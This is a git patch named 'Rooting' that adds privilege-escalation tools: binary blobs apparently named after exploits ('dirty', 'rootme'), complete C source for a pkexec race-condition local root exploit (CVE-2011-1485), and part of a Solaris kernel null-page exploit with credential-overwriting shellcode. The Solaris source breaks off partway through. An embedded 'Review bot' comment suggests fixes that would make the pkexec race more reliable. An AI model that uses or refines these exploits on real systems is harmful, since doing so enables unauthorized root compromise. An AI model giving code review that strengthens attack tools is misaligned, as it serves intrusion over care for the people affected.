From 4ea5c49f7779e3837fffa814749d791b0c6a474d Mon Sep 17 00:00:00 2001 From: syn Date: Mon, 24 Feb 2025 14:06:52 +0700 Subject: [PATCH] Rooting: pkexec-RCPE --- .null | 0 compile/dirty | Bin 0 -> 17328 bytes compile/pkexec-RCPE | Bin 0 -> 17056 bytes compile/rootme | Bin 0 -> 16264 bytes pkexec-RCPE.c | 201 +++++++++++++++++++++++++++++++++++++++++++ solaris-5.10.c | 204 ++++++++++++++++++++++++++++++++++++++++++++ 6 files changed, 405 insertions(+) create mode 100644 .null create mode 100755 compile/dirty create mode 100755 compile/pkexec-RCPE create mode 100755 compile/rootme create mode 100644 pkexec-RCPE.c create mode 100644 solaris-5.10.c diff --git a/.null b/.null new file mode 100644 index 0000000..e69de29 
diff --git a/compile/dirty b/compile/dirty new file mode 100755 index 0000000000000000000000000000000000000000..b06bb856ad3f845d5faa364fcac6b6f5a92a6b97 GIT binary patch literal 17328 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 Hd{F!sGu%+uLq72;ljQgDgQ1gYTcrzryv6kEk2 zIIj__#XOMbNX{+~+5n|?y67#&O5!U3(XIwFCGg`mEf~3lh-g4WH&~3j5Aap zBgYe)kH=Pur;7DZhKW(N>nA%ETWmAIh;?A_mEGz5h^y?v|!}=J`Z*n zmk*lwHt(VO%H4-7#h;PFE9zp=@Rr89Sfn-;53M&ZrcGW)}_)N~gRrTlw@zK4Sjnh}oAET{dt%8nm<*(%39DCxqlpOEfl1Fky{CVl-fKi- z0^MNu+9G!DYTe$fZ}c}7avS}d3;9irLT~MA(<5fe?2D!?Gu74B97`t5E+ZT>!EawY znV|OQwrWX5xFj$1q6&CxRKOqRW)b^Wg)l&epQGi`D0I6yVjpptmC*&*J2ND|^u*K9 z9lhcZ$e8$j$L|>*1^Y0)&zQeN-|=-3Yi5a3kPGz>R<#0XG8WBJhu@)z`J5cPh1!xo_18p$$)1-u!uO z==I9e(j>n*40L{71kP1!f&%sXv1IykKA-O$lQIs>rhhjp17ww{6;M*D5s68STPN zYdJVrM-D3Um+ZK(J>H*e0Erm2ZoRA{bgf}R z8y)^8urK4-^duZm_2g6^)Yv;I3#x@SGK_ZG&;)csSv&~Ex#6QgP7Xf{XK7~p(Q?D% zl0N}w^a=itK^FK4gvsHv0N5X2u7cA^?1``99A>InI(-b4Mn|zpBf}`jhH1HT(5kC9 zuxxk+RdU0J5k_nnUGWywrRDwzjXwd-#MBkg9h&fHM>UV4`I4gf%d(o^Ry3a|t9eM# z>?^AoRx|@;HFqeQ%T&!mBxHO^8hJ{_Wy7i5dARo6@NtaN=qTP3iYJE0j;HZ1lMvj; zK#-x+M!K&>w7ZwfK4Q(Cx*rPOI4z%J`5r2~dC-xY+z7Z4a3kPGz>R<#0XG6}1l$O? 
z5%?%0;DO(4j9^_vbarp=e6X`C)D{TG;1?{>6589*)TIULBIf?O-egjAwYG)YySoAn z^`fb{tF?W1AZ5mr`%SSY)YiT?q&K&<1nNwyr*6PVrw>G+k)Bl*pREVP>HX_4LqM); zCZ9h77yR<#0XG6}1l$OG z;0W-#I9>vUjgOy){sB=WmC!=cbHyE`8r+ye@N!*Aom{` z@Vai*VLjdNAYljLmk9?5vxH-W#|Tw_?*f}ab!RES3*gZ1)r$^2odzoPJ*G5-Q&O0~b-b&X3u%f;4D zvWHnL*|Ng=dG_)rsb5og-k6_(OsVzGiy$CAR&wAG$-~D?p+lb@LRxPOST_X5>#r%C`{Fr6>_pDitDfpK4GRoGm_N%V#%-((<4?gmDY{Spy)})2V$mWM*Q`q zHE`{HR5wy77Z#9siu-iD{exIbbZI3rnZnC+TEhV z^7xhqcQ>`QHUkYCF7%K_rCQ4#q3_()zP)Le-o9f;XQ)f>YTCXl1QzOg{~#~df1ic< zv|*s2j%)gLGh$eVkXHtti+2PRG#hCfL4iP1xuu|pfv|!zd*wekE8Yg6N76~X-$+Do zi$H5TXhot4J(D(JCj#tb0R3<}O}26u18!0%a*z8NiU``yP{ipvY)0VN;x2`fTMvr2 zQWQJDJ4ah6iVB23eK2krVL&ToV?XC$SB04x5dK8cGW~stjDH}N957SXK?fDiL}4#a zG(uF<_SRbLt5Ut+NcRhWb&<{*gJc|kiVZ@Ay=r|#Mx0dFkXKJ0#LTW}t#GU8EiW}Cyk5`K7K;_w`l zdL};vhvPsPP;8M5C_dOZGTblPLgRQvA&hcRLQh3^-A$9P@@Dl)0} z|5;$2_CB&>93wjh{yZ|ipxBR70VC^`vmaONC&+*?%Z7yPkMS3ZJ&#KmcPbMYwqv)i zD)u~HW8`@!>#OnmHQDq17e3M?{33}As{NZ#fbnPha{EHd+5cIwAM@Foj6Y&SLhe6I zUxCbGI5as50FttNX_ zAM0|aB~(AD7mC<^U4gMPZ0|(wJ5JTDTt9WVPe37#W4S&2{>Awzx7}$UY_z3*#W~l@ Tx=YH~AIA?Hq?L++B8vY37eCNR literal 0 HcmV?d00001 diff --git a/pkexec-RCPE.c b/pkexec-RCPE.c new file mode 100644 index 0000000..9e30cd7 --- /dev/null +++ b/pkexec-RCPE.c 
@@ -0,0 +1,201 @@
+/*
+* Exploit Title: pkexec Race condition (CVE-2011-1485) exploit
+* Author: xi4oyu
+* Tested on: rhel 6
+* CVE : 2011-1485
+* Linux pkexec exploit by xi4oyu , thx dm@0x557.org * Have fun~
+¡Á U can reach us @ http://www.wooyun.org :)
+*/
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+
+
+int main(int argc,char *argv[], char ** envp)
+{
+
+ time_t tim_seed1;
+ pid_t pid_seed2;
+ int result;
+ struct stat stat_buff;
+
+ char * chfn_path = "/usr/bin/chfn";
+ char cmd_buff[4096];
+
+ char * pkexec_argv[] = {
+ "/usr/bin/pkexec",
+ "/bin/sh",
+ "-c",
+ cmd_buff,
+ NULL
+ };
+ int pipe1[2];
+ int pipe2[2];
+ int pipe3[2];
+ pid_t pid,pid2 ;
+ char * chfn_argv[] = {
+ "/usr/bin/chfn",
+ NULL
+ };
+
+ char buff[8];
+ char read_buff[4096];
+ char real_path[512];
+ struct termios termios_p;
+
+ int count = 0;
+ int flag = 0;
+ int usleep1 = 0;
+ int usleep2 = 0;
+
+
+ bzero(cmd_buff,4096);
+ bzero(real_path,512);
+ realpath(argv[0],real_path);
+
+ tim_seed1 = time(NULL);
+ pid_seed2 = getpid();
+ srand(tim_seed1+pid_seed2);
+
+
+
+
+ //get terminal attr
+ tcgetattr(0,&termios_p);
+ snprintf(cmd_buff,4095,"/bin/chown root:root %s; /bin/chmod 4755 %s",real_path,real_path);
+// printf("Cmd line:%s",cmd_buff);
+ if(! geteuid()){
+ //Succs => r00t!
+ char * exec_argv[2]={
+ "/bin/sh",
+ NULL
+ };
+ setuid(0);
+ setgid(0);
+ execve("/bin/sh",exec_argv,0);
+ perror("execve shell");
+ exit(-1);
+ }
+
+ printf("pkexec local root exploit by xi4oyu , thx to dm\n");
+
+ if(pipe(pipe1)){
+ perror("pipe");
+ exit(-2);
+ }
+
+ for(count = 500; count && !flag; count--){
+
+ // printf("Count %d\n",count);
+ pid = fork();
+ if( !pid ){
+ // Parent
+ if( !pipe(pipe2)){
+
+ if(!pipe(pipe3)){
+ pid2 = fork();
+ if(!pid2){
+ // Parent 2
+ close(1);
+ close(2);
+ close(pipe1[0]);
+ dup2(pipe1[1],2);
+ dup2(pipe1[1],1);
+ close(pipe1[1]);
+ close(pipe2[0]);
+ close(pipe3[1]);
+ write(pipe2[1],"\xFF",1);
+ read(pipe3[0],&buff,1);
+
+ execve(pkexec_argv[0],pkexec_argv,envp);
+ perror("execve pkexec");
+ exit(-3);
+
+ }
+ close(0);
+ close(1);
+ close(2);
+ close(pipe2[1]);
+ close(pipe3[0]);
+ read(pipe2[0],&buff,1);
+ write(pipe3[1],"\xFF",1);
+ usleep(usleep1+usleep2);
+
+ execve(chfn_argv[0],chfn_argv,envp);
+ perror("execve setuid");
+ exit(1);
+ }
+
+
+ }
+ perror("pipe3");
+ exit(1);
+ }
+
+ //Note: This is child, no pipe3 we use poll to monitor pipe1[0]
+ memset(pipe3,0,8);
+
+ struct pollfd * pollfd = (struct pollfd *)(&pipe3);
+ pollfd->fd = pipe1[0];
+ pollfd->events = POLLRDNORM;
+
+ if(poll(pollfd,1,1000) < 0){
+
+ perror("poll");
+ exit(1);
+ }
+
+ if(pollfd->revents & POLLRDNORM ){
+ memset(read_buff,0,4096);
+ read(pipe1[0],read_buff,4095);
+ if( strstr(read_buff,"does not match")){
+ usleep1 += 500;
+ usleep2 = rand() % 1000;
+
+ }else{
+ usleep1 -= 500;
+
+
+ }
+
+
+ }
+
+ if(!stat(real_path,&stat_buff)){
+ if(!stat_buff.st_uid){
+ if(!stat_buff.st_gid){
+ if(stat_buff.st_mode & 0x800){
+
+ char *exec_array[]={
+ real_path,
+ NULL
+ };
+
+ flag = 1;
+ tcsetattr(0,2,&termios_p);
+ execve(real_path,exec_array,0);
+ perror("execve self");
+ exit(1);
+ }
+ }
+
+ }
+ }
+
+ tcsetattr(0,2,&termios_p);
+
+ }
+ result = 0;
+ return result;
+
+}
+
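Review bot: The poll descriptor at `struct pollfd * pollfd = (struct pollfd *)(&pipe3);` reinterprets the `int pipe3[2]` array as a `struct pollfd`, which breaks strict aliasing and only works while sizeof(struct pollfd) happens to be 8 on the target; declare the real type, `struct pollfd pfd = { .fd = pipe1[0], .events = POLLRDNORM };` with `if(poll(&pfd,1,1000) < 0){` and `if(pfd.revents & POLLRDNORM ){`, and drop the `memset(pipe3,0,8)`. The timing feedback depends on `strstr(read_buff,"does not match")` finding what appears to be an English pkexec message, and because pkexec is started with the caller's `envp`, a non-English locale would presumably leave the delay adjustment inert, so a comment like `/* pkexec's message text is locale dependent; run under LC_ALL=C */` belongs on that line. The `// Parent` and `// Parent 2` comments sit on the `!pid` and `!pid2` branches, which are the child sides of each fork, and should read `// child: execs chfn` and `// grandchild: execs pkexec`. `stat_buff.st_mode & 0x800` reads better as `S_ISUID`, and `chfn_path` is never used.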
diff --git a/solaris-5.10.c b/solaris-5.10.c new file mode 100644 index 0000000..4f3c3d1 --- /dev/null +++ b/solaris-5.10.c 
@@ -0,0 +1,204 @@
+/***********************************************************
+ * hoagie_solaris_siocgtunparam.c
+ * LOCAL SOLARIS KERNEL ROOT EXPLOIT (< 5.10 138888-01) - CVE-2008-568
+ *
+ * Bug reported by Tobias Klein
+ * http://www.trapkit.de/advisories/TKADV2008-015.txt
+ * Exploit by: peri.carding (http://www.void.at/main/)
+ *
+ * $ ./hoagie_solaris_siocgtunparam
+ * hoagie_solaris_siocgtunparam.c - solaris root < < 5.10 138888-01 local
+ * -andi / void.at
+ *
+ * [*] socket created
+ * [*] mapping zero page successful
+ * [*] process cred address: 0xd3853894
+ * [*] prepare null page
+ * [*] clean up write queue
+ * # uname -a
+ * SunOS unknown 5.10 Generic_118844-26 i86pc i386 i86pc
+ * # id
+ * uid=0(root) gid=0(root)
+ * #
+ *
+ * First of all we have to make sure that ip_extract_tunreq() will
+ * return 0 and ipifp is still set to NULL. This can be achieved by
+ * using an interface alias starting with zero. (the interface ip.tun0
+ * must not exist because ipif_lookup_on_name() will "fail" to get
+ * null page)
+ *
+ * ip_if.c / ipif_lookup_on_name()
+ * ...
+ * if (&cp[2] < endp && cp[1] == '0')
+ * return (NULL);
+ * ...
+ *
+ * In ip_sioctl_tunparam() ipif->ipif_ill is used for mutex enter
+ * so we have to set the offet for an ill_t structure. Later putnext()
+ * will be called with a queue (see ill_t). We can use this queue to
+ * add a custom callback function that is used by putnext().
+ *
+ * ip_if.c / ip_sioctl_tunparam():
+ * ...
+ * ill = ipif->ipif_ill;
+ * mutex_enter(&connp->conn_lock);
+ * mutex_enter(&ill->ill_lock);
+ * ...
+ * if (success) {
+ * ip1dbg(("sending down tunparam request "));
+ * putnext(ill->ill_wq, mp1);
+ * return (EINPROGRESS);
+ * ...
+ *
+ * putnext.c / putnext():
+ * ...
+ * mutex_exit(QLOCK(qp));
+ * STR_FTEVENT_MSG(mp, fqp, FTEV_PUTNEXT, mp->b_rptr -
+ * mp->b_datap->db_base);
+ * (*putproc)(qp, mp);
+ * ...
+ *
+ * ill_wq can't be modified from kernel space because its allocated
+ * in userland -> so we cannot modify the ill_wq queue in kernel
+ * code. thereforce a signal handler will clean the queue in userland.
+ *
+ * Affected Software: Solaris 10 without patch 138888-01 (SPARC)
+ * Solaris 10 without patch 138889-01 (x86)
+ * OpenSolaris < snv_77 (SPARC)
+ * OpenSolaris < snv_77 (x86)
+ *
+ * THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-
+ * CONCEPT. THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY
+ * DAMAGE DONE USING THIS PROGRAM.
+ *
+ * VOID.AT Security
+ * andi@void.at
+ * http://www.void.at
+ *
+ ************************************************************/
+#define _STRUCTURED_PROC 1
+
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+int *nullpage;
+
+void clean_up_wq() {
+ fprintf(stderr, "[*] clean up write queue\n");
+ *(nullpage + 0x208 / 4) = 0x000;
+}
+
+int get_proc_address() {
+ int fd;
+ char filename[512];
+ psinfo_t psinfo;
+
+ snprintf(filename, sizeof(filename), "/proc/%d/psinfo", getpid());
+ fd = open(filename, O_RDONLY);
+ if (fd == -1) {
+ return -1;
+ }
+
+ memset(&psinfo, 0, sizeof(psinfo_t));
+ if (read(fd, &psinfo, sizeof(psinfo_t)) != sizeof(psinfo_t)) {
+ close(fd);
+ return -1;
+ }
+
+ close(fd);
+
+ return psinfo.pr_addr;
+}
+
+/**
+ * \xff\xff\xff\xff will be replaced by target process credential address
+ * (can be any process). set cr_uid, cr_gid, cr_ruid and cr_rguid to 0.
+ */
+char shellcode[] =
+ "\x50"
+ "\xb8\xff\xff\xff\xff"
+ "\x8b\x00"
+ "\xc7\x40\x10\x00\x00\x00\x00"
+ "\xc7\x40\x0c\x00\x00\x00\x00"
+ "\xc7\x40\x08\x00\x00\x00\x00"
+ "\xc7\x40\x04\x00\x00\x00\x00"
+ "\x58"
+ "\xc3";
+
+int main(int argc, char **argv) {
+ int s;
+ struct iftun_req req;
+ int cred_addr;
+
+ fprintf(stderr,
+ "hoagie_solaris_siocgtunparam.c - solaris root < < 5.10 138888-01 local\n"
+ "-andi / void.at\n\n");
+
+ s = socket(PF_INET, SOCK_DGRAM, IPPROTO_IP);
+ if (s == -1) {
+ fprintf(stderr, "[-] can't create socket\n");
+ return -1;
+ } else {
+ fprintf(stderr, "[*] socket created\n");
+ }
+
+ memset(&req, 0, sizeof(req));
